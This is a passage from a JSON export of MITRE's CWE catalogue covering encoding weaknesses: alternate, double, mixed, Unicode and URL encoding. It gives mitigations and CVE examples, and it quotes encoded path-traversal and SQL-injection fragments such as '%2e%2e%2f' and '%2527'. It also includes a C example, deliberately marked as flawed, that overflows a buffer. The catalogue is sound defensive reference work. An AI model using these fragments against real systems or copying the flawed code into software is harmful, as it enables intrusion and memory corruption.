Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"173":{"attr":{"@_ID":"173","@_Name":"Improper Handling of Alternate Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Encoding"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"4"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Alternate Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Alternate Encoding","attr":{"@_Date":"2010-12-13"}}]}},"174":{"attr":{"@_ID":"174","@_Name":"Double Decoding of the Same Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Availability","Integrity","Other"],"Impact":["Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1315","Description":"Forum software improperly URL decodes the highlight parameter when extracting text to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1315"},{"Reference":"CVE-2004-1939","Description":"XSS protection mechanism attempts to remove \\"/\\" that could be used to close tags, but it can be bypassed using double encoded slashes (%252F)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1939"},{"Reference":"CVE-2001-0333","Description":"Directory traversal using double encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333"},{"Reference":"CVE-2004-1938","Description":"\\"%2527\\" (double-encoded single quote) used in SQL injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1938"},{"Reference":"CVE-2005-1945","Description":"Double hex-encoded data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1945"},{"Reference":"CVE-2005-0054","Description":"Browser executes HTML at higher privileges via URL with hostnames that are double hex encoded, which are decoded twice to generate a malicious hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0054"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Double Encoding"}},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Double Encoding","attr":{"@_Date":"2008-04-11"}}}},"175":{"attr":{"@_ID":"175","@_Name":"Improper Handling of Mixed Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when the same input uses several different (mixed) encodings.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Mixed Encoding"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Mixed Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Mixed Encoding","attr":{"@_Date":"2010-12-13"}}]}},"176":{"attr":{"@_ID":"176","@_Name":"Improper Handling of Unicode Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when an input contains Unicode encoding.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Windows provides the MultiByteToWideChar(), WideCharToMultiByte(), UnicodeToBytes(), and BytesToUnicode() functions to convert between arbitrary multibyte (usually ANSI) character strings and Unicode (wide character) strings. The size arguments to these functions are specified in different units, (one in bytes, the other in characters) making their use prone to error.","Body_Text":["In a multibyte character string, each character occupies a varying number of bytes, and therefore the size of such strings is most easily specified as a total number of bytes. In Unicode, however, characters are always a fixed size, and string lengths are typically given by the number of characters they contain. Mistakenly specifying the wrong units in a size argument can lead to a buffer overflow.","The following function takes a username specified as a multibyte string and a pointer to a structure for user information and populates the structure with information about the specified user. Since Windows authentication uses Unicode for usernames, the username argument is first converted from a multibyte string to a Unicode string.","This function incorrectly passes the size of unicodeUser in bytes instead of characters. The call to MultiByteToWideChar() can therefore write up to (UNLEN+1)*sizeof(WCHAR) wide characters, or (UNLEN+1)*sizeof(WCHAR)*sizeof(WCHAR) bytes, to the unicodeUser array, which has only (UNLEN+1)*sizeof(WCHAR) bytes allocated.","If the username string contains more than UNLEN characters, the call to MultiByteToWideChar() will overflow the buffer unicodeUser."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void getUserInfo(char *username, struct _USER_INFO_2 info){}","xhtml:div":{"#text":"WCHAR unicodeUser[UNLEN+1];MultiByteToWideChar(CP_ACP, 0, username, -1, unicodeUser, sizeof(unicodeUser));NetUserGetInfo(NULL, unicodeUser, 2, (LPBYTE *)&amp;info);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0884","Description":"Server allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain Unicode encoded characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0884"},{"Reference":"CVE-2001-0709","Description":"Server allows a remote attacker to obtain source code of ASP files via a URL encoded with Unicode.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0709"},{"Reference":"CVE-2001-0669","Description":"Overlaps interaction error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0669"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unicode Encoding"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC10-C","Entry_Name":"Character Encoding - UTF8 Related Issues"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"71"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;Character Sets and Unicode&#34;, Page 446"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Unicode Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Unicode Encoding","attr":{"@_Date":"2010-12-13"}}]}},"177":{"attr":{"@_ID":"177","@_Name":"Improper Handling of URL Encoding (Hex Encoding)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when all or part of an input has been URL encoded.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0900","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0900"},{"Reference":"CVE-2005-2256","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2256"},{"Reference":"CVE-2004-2121","Description":"Hex-encoded path traversal variants - \\"%2e%2e\\", \\"%2e%2e%2f\\", \\"%5c%2e%2e\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2004-0280","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0280"},{"Reference":"CVE-2003-0424","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0424"},{"Reference":"CVE-2001-0693","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0693"},{"Reference":"CVE-2001-0778","Description":"\\"%20\\" (encoded space)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0778"},{"Reference":"CVE-2002-1831","Description":"Crash via hex-encoded space \\"%20\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1831"},{"Reference":"CVE-2000-0671","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671"},{"Reference":"CVE-2004-0189","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189"},{"Reference":"CVE-2002-1291","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1291"},{"Reference":"CVE-2002-1031","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031"},{"Reference":"CVE-2001-1140","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140"},{"Reference":"CVE-2004-0760","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0760"},{"Reference":"CVE-2002-1025","Description":"\\"%00\\" (encoded null)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025"},{"Reference":"CVE-2002-1213","Description":"\\"%2f\\" (encoded slash)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1213"},{"Reference":"CVE-2004-0072","Description":"\\"%5c\\" (encoded backslash) and \\"%2e\\" (encoded dot) sequences","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0072"},{"Reference":"CVE-2004-0847","Description":"\\"%5c\\" (encoded backslash)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847"},{"Reference":"CVE-2002-1575","Description":"\\"%0a\\" (overlaps CRLF)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1575"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"URL Encoding (Hex 